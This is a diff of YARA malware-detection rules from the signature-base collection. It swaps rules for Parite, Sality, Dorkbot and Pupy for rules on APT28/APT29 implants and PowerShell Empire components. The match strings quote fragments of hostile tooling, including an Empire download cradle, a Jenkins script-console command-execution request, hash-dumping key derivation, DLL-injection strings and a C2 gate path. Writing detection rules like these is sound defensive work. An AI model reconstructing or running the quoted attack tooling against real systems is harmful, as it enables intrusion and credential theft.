+         86 00 00 00 8A C3 B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D
+         71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A 44 37 FE 03 D6 8B D8 8D
+         46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32
+         D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5
+         8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38
+         41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C 24 1C 8B 74 24 20
+         8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F
+         82 3C FF FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB
+         0D 33 C9 89 4C 24 38 E9 40 FF FF FF 33 C9 8B 44 24 24 33 D2 BE 06 00
+         00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00 8A C3 B2
+         06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34
+         8D 54 03 FE 89 54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44
+         3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA 07 89 54 24 2C 8D 46 FF 33 D2
+         BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5
+         8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B
+         44 24 14 02 D9 8A 0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46
+         3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18 C2 10 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.imphash ( ) == "500cd02578808f964519eb2c85153046"
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-rule SIGNATURE_BASE_MAL_Parite_Malware_May19_1 : FILE
+rule SIGNATURE_BASE_IMPLANT_6_V6 : FILE
 {
 	meta:
-		description = "Detects Parite malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f4c9da17-9894-5243-828a-827accb0bac5"
-		date = "2019-05-31"
-		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L80-L100"
+		description = "Sednit / EVILTOSS Implant by APT28"
+		author = "US CERT"
+		id = "89cc3764-d60c-5cbd-af32-a90d8b3400d7"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1329-L1343"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b458b05178f18be1e936c1b42bbd91c739f288570fca759b85f1bb143899f1a8"
-		score = 80
+		logic_hash = "77b5f95cd897c82c200ee6fa3970824adccfd7c56639d92361095f919781d731"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
-		hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
-		hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
-		hash4 = "b987dcc752d9ceb3b0e6cd4370c28567be44b789e8ed8a90c41aa439437321c5"
 
 	strings:
-		$s1 = "taskkill /im cmd.exe /f" fullword ascii
-		$s2 = "LOADERX64.dll" fullword ascii
-		$x1 = "\\dllhot.exe" ascii
-		$x2 = "dllhot.exe --auto --any --forever --keepalive" fullword ascii
+		$Init1_fun = {68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50
+         FF 15 ?? ?? ?? ?? 33 C0 C3}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0xCFD0 or uint16( 0 ) == 0xC3D4 or uint32( 0 ) == 0x46445025 or uint32( 1 ) == 0x6674725C ) and all of them
 }
-
-rule SIGNATURE_BASE_MAL_Parite_Malware_May19_2 : FILE
+rule SIGNATURE_BASE_IMPLANT_7_V1 : FILE
 {
 	meta:
-		description = "Detects Parite malware based on Imphash"
-		author = "Florian Roth (Nextron Systems)"
-		id = "33970268-610c-5abf-9e9e-83dae0c81064"
-		date = "2019-05-31"
-		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L102-L118"
+		description = "Implant 7 by APT29"
+		author = "US CERT"
+		id = "ce83c157-af03-55cb-a2be-0b6543fedb5b"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1368-L1381"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "060a26ed6679b7038f1a89385220ad9112d3102023ea9d141332077f79bbe728"
-		score = 75
+		logic_hash = "996f81fe006e0ab15adab46275fdb60251e6c6616da33df600fadfc2684c24af"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "c9d8852745e81f3bfc09c0a3570d018ae8298af675e3c6ee81ba5b594ff6abb8"
-		hash2 = "8d47b08504dcf694928e12a6aa372e7fa65d0d6744429e808ff8e225aefa5af2"
-		hash3 = "285e3f21dd1721af2352196628bada81050e4829fb1bb3f8757a45c221737319"
-		hash4 = "b987dcc752d9ceb3b0e6cd4370c28567be44b789e8ed8a90c41aa439437321c5"
+
+	strings:
+		$STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE }
+		$STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 18000KB and ( pe.imphash ( ) == "b132a2719be01a6ef87d9939d785e19e" or pe.imphash ( ) == "78f4f885323ffee9f8fa011455d0523d" )
+		( uint16( 0 ) == 0x5A4D ) and ( $STR1 or $STR2 )
 }
-rule SIGNATURE_BASE_EXPL_Strings_CVE_POC_May19_1 : FILE
+rule SIGNATURE_BASE_IMPLANT_8_V1 : FILE
 {
 	meta:
-		description = "Detects strings used in CVE POC noticed in May 2019"
-		author = "Florian Roth (Nextron Systems)"
-		id = "df11e0b1-e907-5a24-a3e7-0e78acb379f7"
-		date = "2019-05-31"
-		modified = "2023-12-05"
-		reference = "https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nansh0u.yar#L120-L136"
+		description = "HAMMERTOSS / HammerDuke Implant by APT29"
+		author = "US CERT"
+		id = "eeaa43c1-6004-5d64-bdc1-f84b3c68d741"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1383-L1411"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b470e9f5716130d810e519abb8d4e1058b5a806d59ddae53a40cac5597fbb874"
-		score = 80
+		logic_hash = "437bda331405f9203747ffbfb107ec26e33973ebfc9f02e153697f7b8c22ad4f"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		hash1 = "01c3882e8141a25abe37bb826ab115c52fd3d109c4a1b898c0c78cee8dac94b4"
 
 	strings:
-		$x1 = "\\Debug\\poc_cve_20" ascii
-		$x2 = "\\Release\\poc_cve_20" ascii
-		$x3 = "alloc fake fail: %x!" fullword ascii
-		$x4 = "Allocate fake tagWnd fail!" fullword ascii
+		$DOTNET = "mscorlib" ascii
+		$REF_URL = "https://www.google.com/url?sa=" wide
+		$REF_var_1 = "&rct=" wide
+		$REF_var_2 = "&q=&esrc=" wide
+		$REF_var_3 = "&source=" wide
+		$REF_var_4 = "&cd=" wide
+		$REF_var_5 = "&ved=" wide
+		$REF_var_6 = "&url=" wide
+		$REF_var_7 = "&ei=" wide
+		$REF_var_8 = "&usg=" wide
+		$REF_var_9 = "&bvm=" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
+		( uint16( 0 ) == 0x5A4D ) and ( $DOTNET ) and ( $REF_URL ) and ( 3 of ( $REF_var* ) )
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Oct16_A : FILE
+rule SIGNATURE_BASE_IMPLANT_9_V1 : FILE
 {
 	meta:
-		description = "Detects an unspecififed malware - October 2016"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f62ecf7e-2b66-5567-9bf3-3d3797bc582d"
-		date = "2016-10-08"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L10-L46"
+		description = "Onion Duke Implant by APT29"
+		author = "US CERT"
+		id = "5460ff29-681b-5d11-a6ba-5f294e8577e6"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1431-L1448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d71e6640be1b10790d49c084b9ba248e35a6a56dfe9c5a3f219a209024ebec27"
-		score = 80
+		logic_hash = "1166ef923d39952f4131a693c58b8bab5dcbe87f6a6b548a706d1fa10a82e22c"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d112a7e21902287e4a37112bf17d7c73a7b206e7bc81780fd87991c1519f38c8"
 
 	strings:
-		$x1 = "%s\\system32\\%s.dll" fullword ascii
-		$x2 = "%SystemRoot%\\System32\\svch%s -k nets" fullword ascii
-		$x3 = "\\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A" fullword ascii
-		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword ascii
-		$s2 = "boottemp.exe" fullword ascii
-		$s3 = "at \\\\%s %d:%d C:\\%s.exe" fullword ascii
-		$s4 = "cryptcom.dll" fullword ascii
-		$s5 = "Wininet.dll" fullword ascii
-		$s6 = "\\\\%s\\%s\\%s.exe" fullword ascii
-		$s7 = "%s%d.exe" fullword ascii
-		$s8 = "booter.exe" fullword ascii
-		$s9 = "\\\\%s\\pipe%s" fullword ascii
-		$s10 = "C:\\DelInfo.bin" fullword ascii
-		$op0 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 }
-		$op1 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 }
-		$op2 = { ee 11 74 cf 73 0b 91 c4 c9 57 b2 d9 36 86 a5 b4 }
+		$STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE }
+		$STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF
+         3B C6 72 E7 }
+		$STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88
+         4C 02 04 40 3B 06 72 E3 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $x* ) or 3 of ( $s* ) or all of ( $op* ) ) ) or ( 6 of them )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Sality_Malware_Oct16 : FILE
+rule SIGNATURE_BASE_IMPLANT_10_V2 : FILE
 {
 	meta:
-		description = "Detects an unspecififed malware - October 2016"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7bf2a818-f7ee-587e-b22e-b557251d89e1"
-		date = "2016-10-08"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L48-L63"
+		description = "CozyDuke / CozyCar / CozyBear Implant by APT29"
+		author = "US CERT"
+		id = "9c6d4eb9-98a5-5c6d-ba3a-0ce7524c5d2a"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1469-L1482"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5bf14bbb0a7298a7bc896029c4b92ef9adf24307e4d05dcf86a518b266d1c2a8"
-		score = 80
+		logic_hash = "dc201d25b1d6cf8f88ae3bee18057902c4d64316aa9debc9248b0d8aa7f6d170"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8eaff5e1d4b55dd6e25f007549271da10afd1fa25064d7105de0ca2735487aad"
 
 	strings:
-		$s1 = "Hello world!" fullword wide
-		$s2 = "[LordPE]" fullword ascii
+		$xor = { 34 ?? 66 33 C1 48 FF C1 }
+		$nop = { 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5A4D and $xor and $nop
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Oct16_C : FILE
+rule SIGNATURE_BASE_Unidentified_Malware_Two
 {
 	meta:
-		description = "Detects an unspecififed malware - October 2016"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fff98097-a19a-59aa-bece-837c75b0995c"
-		date = "2016-10-08"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L65-L80"
+		description = "Unidentified Implant by APT29"
+		author = "US CERT"
+		id = "848f2d1f-e352-51c1-ac5d-841bf309f2f2"
+		date = "2017-02-10"
+		modified = "2025-07-01"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_grizzlybear_uscert.yar#L1521-L1543"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1f212ef700e77c82954d997beef1157835da38330b583d02df418e10b6c182ee"
-		score = 80
+		logic_hash = "cd9adfb9e27e4d6b27498cc029e15132343f036cca60210528720a533fe20d9a"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a451157f75627b2fef3d663946c94ef7dacb58f08b31d0ec4c0a542a1c4e6205"
+		tags = ""
 
 	strings:
-		$s1 = "dUSER32.DLL" fullword wide
-		$s2 = "output.dll" fullword ascii
+		$my_string_one = "/zapoy/gate.php"
+		$my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55
+         FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38 0F B6 45 FC 8A
+         55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 }
+		$my_string_three = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb"
+		$my_string_four = { 8B CF 0F AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8
+         8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 }
+		$my_string_five = "fuckyou1"
+		$my_string_six = "xtool.exe"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them )
+		($my_string_one and $my_string_two ) or ( $my_string_three or $my_string_four ) or ( $my_string_five and $my_string_six )
 }
-rule SIGNATURE_BASE_Bladabindi_Malware_B64 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Metasploitpayload : FILE
 {
 	meta:
-		description = "Detects Bladabindi Malware using Base64 encoded strings"
+		description = "Detects Empire component - file Invoke-MetasploitPayload.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7f7023be-b6e1-5e1b-af8a-c413a5438ec8"
-		date = "2016-10-08"
+		id = "608c30b0-826a-55b1-afb8-756b476d6b55"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L91-L108"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L10-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "081a6361e29fc231f1467b837c51a39b8cccf8caa20844b22d469ce2bbd0c7fb"
+		logic_hash = "1399818f71544245a7b689a7eb4da794b10814590e4c5f545fc28237ffa3d0f6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dda668b0792b7679979e61f2038cf9a8ec39415cc161be00d2c8301e7d48768d"
+		hash1 = "a85ca27537ebeb79601b885b35ddff6431860b5852c6a664d32a321782808c54"
 
 	strings:
-		$s1 = "XHN5c3RlbTMyXA==" fullword ascii
-		$s2 = "RXhlY3V0ZSBFUlJPUg==" fullword ascii
-		$s3 = "dHJvamFuLmV4ZQ==" fullword ascii
-		$s4 = "VXBkYXRlIEVSUk9S" fullword ascii
-		$s5 = "RG93bmxvYWQgRVJST1I=" fullword ascii
+		$s1 = "$ProcessInfo.Arguments=\"-nop -c $DownloadCradle\"" fullword ascii
+		$s2 = "$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 9KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Dorkbot_Injector_Malware : FILE
+rule SIGNATURE_BASE_Empire_Exploit_Jenkins : FILE
 {
 	meta:
-		description = "Detects Darkbot Injector"
+		description = "Detects Empire component - file Exploit-Jenkins.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b32986fe-d6f1-55f2-8d50-bc348b52fb49"
-		date = "2016-10-08"
+		id = "f2162783-34cd-5db4-bd1c-6c58feb92e77"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L110-L129"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L26-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "36138520b0d39dc311b8e9355d1d1c215908a5fe1c01eec76c689f7e74a84303"
+		logic_hash = "caf65814a1aeb0e14ec6430f7d5692b9c090bdc0d453566f0b0abd703f74bac7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bc3c5ac7180c8ac21d6908d747aa6122154d2bb51bb99ff0e0b1c65088d275dc"
+		hash1 = "a5182cccd82bb9984b804b365e07baba78344108f225b94bd12a59081f680729"
 
 	strings:
-		$s1 = "Enter an integer, a real number, a character and a string : " fullword ascii
-		$s2 = "ready to finish" fullword ascii
-		$s3 = "EYEnpw" fullword ascii
-		$s4 = "somewhere i belong" fullword ascii
-		$s5 = "Not all fields were assigned" fullword ascii
-		$s6 = "take down" fullword ascii
-		$s7 = "real number = %f" fullword ascii
+		$s1 = "$postdata=\"script=println+new+ProcessBuilder%28%27\"+$($Cmd)+\"" ascii
+		$s2 = "$url = \"http://\"+$($Rhost)+\":\"+$($Port)+\"/script\"" fullword ascii
+		$s3 = "$Cmd = [System.Web.HttpUtility]::UrlEncode($Cmd)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 6 of them )
+		( uint16( 0 ) == 0x6620 and filesize < 7KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Oct16_D : FILE
+rule SIGNATURE_BASE_Empire_Get_Securitypackages : FILE
 {
 	meta:
-		description = "Detects unspecified malware - October 2016"
+		description = "Detects Empire component - file Get-SecurityPackages.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6908467c-1ed6-508d-9503-246dd26823e5"
-		date = "2016-10-08"
+		id = "a109eda1-a26d-5cf6-b6b5-1a1a1e770a0a"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L131-L150"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L43-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "78cde422987d2aff64967b86b6cf9279c112a2bfb713a2ea40fe952379d2e326"
+		logic_hash = "2d63fdcc6713d2f7645b16cf3e79a6e951c7751a10bfa0e2853def47ea9547d2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cd5f3bc0176a6803093ffdea6a7442c416e0d2945b6903063d17f5bb8d17519d"
+		hash1 = "5d06e99121cff9b0fce74b71a137501452eebbcd1e901b26bde858313ee5a9c1"
 
 	strings:
-		$s1 = "C:\\file.exe" fullword wide
-		$s2 = "new.exe" fullword wide
-		$s3 = "passwordIterations" fullword ascii
-		$op0 = { 10 00 12 00 1a 00 05 00 01 00 01 00 01 00 10 00 }
-		$op1 = { 41 32 00 36 00 62 00 34 00 32 00 65 00 37 00 62 }
-		$op2 = { 3c 4d 6f 64 75 6c 65 3e 00 6e 65 77 2e 65 78 65 }
+		$s1 = "$null = $EnumBuilder.DefineLiteral('LOGON', 0x2000)" fullword ascii
+		$s2 = "$EnumBuilder = $ModuleBuilder.DefineEnum('SSPI.SECPKG_FLAG', 'Public', [Int32])" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) or all of ( $op* ) )
+		( uint16( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Oct16_E : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Powerdump : FILE
 {
 	meta:
-		description = "Detects unspecified Malware - October 2016"
+		description = "Detects Empire component - file Invoke-PowerDump.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fffffe0c-e114-5648-96ea-dd692610e34c"
-		date = "2016-10-08"
+		id = "d1082a4e-d458-57fb-b332-7c775c8ef2dd"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L152-L167"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L59-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2040a8cee840560a5aa6065df17206c0313d85b2d11ce482baab05c492360f35"
+		logic_hash = "e460d015be54a88d0eb5741a9c32cf6d7a410e0beb5356402af0dd19d1b4c6f2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "28093385130b61f22920c0ce6e56de1f2cd8eef589bebe2af31f36f51f2b4d01"
+		hash1 = "095c5cf5c0c8a9f9b1083302e2ba1d4e112a410e186670f9b089081113f5e0e1"
 
 	strings:
-		$s1 = "P3pORt" fullword ascii
-		$s2 = "msdownld.tmp" fullword ascii
-		$s3 = "TMP4351$.TMP" fullword ascii
+		$x16 = "$enc = Get-PostHashdumpScript" fullword ascii
+		$x19 = "$lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;" fullword ascii
+		$x20 = "$rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x2023 and filesize < 60KB and 1 of them ) or all of them
 }
-
-rule SIGNATURE_BASE_Pupy_Backdoor : FILE
+rule SIGNATURE_BASE_Empire_Install_SSP : FILE
 {
 	meta:
-		description = "Detects Pupy backdoor"
+		description = "Detects Empire component - file Install-SSP.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "11509847-3454-5412-b3e1-02ad9cccc6ae"
-		date = "2017-08-11"
+		id = "06bbdcc5-c48b-5753-88a2-5c962d1b986f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/n1nj4sec/pupy-binaries"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_pupy_rat.yar#L13-L44"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L76-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0b12376c9cddc71f584314b07fb29fac189349b526c6d5028f475fa3984401ae"
+		logic_hash = "bf0966d0141d4606983f267face635ef5fddbc73282f02f0a0ae6fcf89f2e6dc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153"
-		hash2 = "83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4"
-		hash3 = "90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc"
-		hash4 = "20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8"
-		hash5 = "06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e"
-		hash6 = "be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2"
-		hash7 = "8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01"
+		hash1 = "7fd921a23950334257dda57b99e03c1e1594d736aab2dbfe9583f99cd9b1d165"
 
 	strings:
-		$x1 = "reflectively inject a dll into a process." fullword ascii
-		$x2 = "ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid" fullword ascii
-		$x3 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" fullword ascii
-		$x4 = "reflective_inject_dll" fullword ascii
-		$x5 = "ld_preload_inject_dll" fullword ascii
-		$x6 = "get_pupy_config() -> string" fullword ascii
-		$x7 = "[INJECT] inject_dll. OpenProcess failed." fullword ascii
-		$x8 = "reflective_inject_dll" fullword ascii
